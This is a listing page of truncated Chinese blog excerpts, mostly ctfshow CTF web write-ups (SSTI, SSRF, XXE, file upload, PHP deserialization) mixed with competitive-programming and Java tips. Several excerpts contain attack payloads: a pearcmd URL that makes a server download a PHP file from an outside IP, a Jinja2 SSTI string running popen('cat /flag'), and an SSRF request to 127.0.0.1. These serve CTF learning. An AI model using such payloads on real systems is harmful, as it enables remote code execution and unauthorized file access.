unserialize ctfshow easy

栅栏密码 密文： 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式：KEY{XXXXXXXXXXXXXX} 十六进制，想到 bas ......

骨灰级的项目是真的巨恶心，呐，今天又碰到了一个用jsp页面，列表表格使用easyUI的datagrid标签渲染的。 主要是用js，执行一下选中代码： $("#roleList").datagrid({ onLoadSuccess: function(data){ //初始化时执行选中 $("#rol ......

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload： http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php： `"; ?>` 上传成功后显示： ``` do ......

小提示：需要从图片上提取flag文字，可以通过截图翻译或者微信发送图片，这两个的ai图像识别挺好用的。 misc1： 解压打开就能看见flag，提取出来就行 misc2： 记事本打开，看见 ng字符，尝试更改后缀为.png，重新打开看见flag misc3： 题目为bpg文件，使用一些看图软件可以打 ......

[题目链接](https://ac.nowcoder.com/acm/problem/19989) # 题目 **题目描述** 为了使得大家高兴，小Q特意出个自认为的简单题（easy）来满足大家，这道简单题是描述如下： 有一个数列A已知对于所有的A[i]都是1~n的自然数，并且知道对于一些A[i]不 ......

## 思路 发现一个进阶回文序列仅包含三个部分：$x$ 个连续的 $a$，$y$ 个连续的 $b$，$x$ 个连续的 $a$。 对于一个 $a$，我们一定会取最外面的两个 $a$，如果不取，则答案一定不小或不变，所以我们枚举到 $a$ 的时候，一定是确定了最外围的两个 $a$ 的位置。 接下来再枚举 ......

## 思路 发现一个进阶回文序列仅包含三个部分：$x$ 个连续的 $a$，$y$ 个连续的 $b$，$x$ 个连续的 $a$。 对于一个 $a$，我们一定会取最外面的两个 $a$，如果不取，则答案一定不小或不变，所以我们枚举到 $a$ 的时候，一定是确定了最外围的两个 $a$ 的位置。 接下来再枚举 ......

# unserialize3 writeup ## php 序列化 序列化是程序类型转化为字符串的过程 ### 字符串的序列化 ```php ``` 得到的输出是 ```php s:7:"faraday"; ``` 可以统一表达为正则的形式 ```regex '/s:[0-9]+:"[^"]+";/ ......

前提是依赖必须导入： <dependency> <groupId>com.alibaba</groupId> <artifactId>easyexcel</artifactId> <version>2.2.0-beta2</version> </dependency> 导出 首先在自己的接口中创建一 ......

1.easy-captcha工具包 生成验证码的方式有许多种，这里选择的是easy-captcha工具包。github开原地址为：easy-captcha工具包其支持Java图形验证码，支持gif、中文、算术等类型，可用于Java Web、JavaSE等项目。 2添加依赖 首先需要将easy-cap ......

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截，右键查看源代码和f12均失效,两种方 ......

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹， ......

# ctfshow--web入门--XXE ## web373 源码 ```php loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //解析xml文档 $creds = simplexml_import_dom($dom); $ctfshow = ......

# ctfshow--web入门--文件上传 ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过  检查前端代码进 ......

## HDU7326 string magic(Easy Version) ### tag：回文自动机 ### [题目链接](http://acm.hdu.edu.cn/showproblem.php?pid=7326) ### 题意： 多组样例，每组输入一字符串(长度1e5以内)，输出满足下列条件 ......

## jwt介绍 对json格式的信息采取的一种编码 JWT：Json web token 由两个点分隔成三个部分，分别为: - Header - Payload - Signature： 如果在Header部分声明的签名算法为HS256，以及服务器约定使用的密钥为secret 那么签名使用的算法一 ......

# ctfshow-SSRF #### web351 flag在flag.php下，直接访问没有权限 使用curl_exec访问才有权限 > url = http://127.0.0.1/flag.php #### web352 开始上过滤了 使用`0.0.0.0`访问本机上的服务 > url = ......

# CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` ......

[link](https://codeforces.com/contest/1855/problem/C1) 像这种构造题可以先分类讨论一波 比如说全是正数或者全是负数，那么显然的就是可以用前缀和和后缀和来解决。 而如果有正有负呢？可以注意到的是数字非常小，而$2^5=32>20$了，那么我们就可以 ......

一、题目链接 https://buuoj.cn/challenges#[%E6%8A%A4%E7%BD%91%E6%9D%AF%202018]easy_tornado 二、解法步骤 本题一共给了三个文件： 同时发现，打开不同的文件url的格式都是差不多的：file?filename=xxx&file ......

一、题目链接 https://adworld.xctf.org.cn/challenges/list 二、解法步骤 本题考察的是反序列化，反序列化的题都需要审计php代码，步骤也比较固定。 <?php if (isset($_GET['var'])) { $var = base64_decode($ ......

# Codeforces Round 890 (Div. 2) ## A Tales of a Sort > 阿尔芬有一个长度为 $n$的正整数数组 $a$。 > > 阿尔芬可以进行以下运算： > > - 对于从 $1$ 到 $n$ 的所 $i$，用 $\max(0, a_i - 1)$ 替换 $a ......

E1. PermuTree (easy version) This is the easy version of the problem. The differences between the two versions are the constraint on $n$ and the time ......

**GDCPC A题** **原题链接：**https://cpc.csgrandeur.cn/csgoj/problemset/problem?pid=1168 **类似的题目及视频解释链接：** **题目：**https://www.acwing.com/problem/content/desc ......

[洛谷传送门](https://www.luogu.com.cn/problem/CF1856E1 "洛谷传送门") [CF 传送门](https://codeforces.com/problemset/problem/1856/E1 "CF 传送门") 考虑局部贪心，假设我们现在在 $u$，我们希 ......

**链接：** https://codeforces.com/contest/1856/problem/E1 **题目大意：** 给定一棵以节点 $1$ 为根的树，树的大小不超过 $n(1\leq n\leq 5000)$ ，给树的节点赋各不相同的权值（可以简化为某个 $[1,n]$ 的排列），使得 ......

[题面传送门(luogu)](https://www.luogu.com.cn/problem/CF958E1) | [题面传送门(CF)](https://codeforces.com/problemset/problem/958/E1) 本题的翻译好像少了点东西（建议直接阅读英文题面，推荐一个[ ......

# ctfshow--web入门--文件上传 [TOC](目录标题) ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过 ![在这里插入图片描述](https://img-blog.csdnimg.cn/608e51750ded43f2aefc1c2a66a3e803. ......

### [题目传送门](https://www.luogu.com.cn/problem/P8512) ## solution 简单题，考虑正着做扫描线，维护最后一次覆盖每个位置的修改时间，这个可以用 $set$ 维护颜色段数均摊。 那么显然对于一个以当前位置为右端点的询问，其答案就是所有最后修改时 ......

[SWPUCTF 2021 新生赛]ez_unserialize 题目来源：nssctf 题目类型：web 涉及考点：PHP反序列化 1. 检查一下源代码，发现Disallow： 猜测大概有`robots.txt`，扫下后台看看： 额，flag.php都扫出来了，但是进不去，还是老老实实看robot ......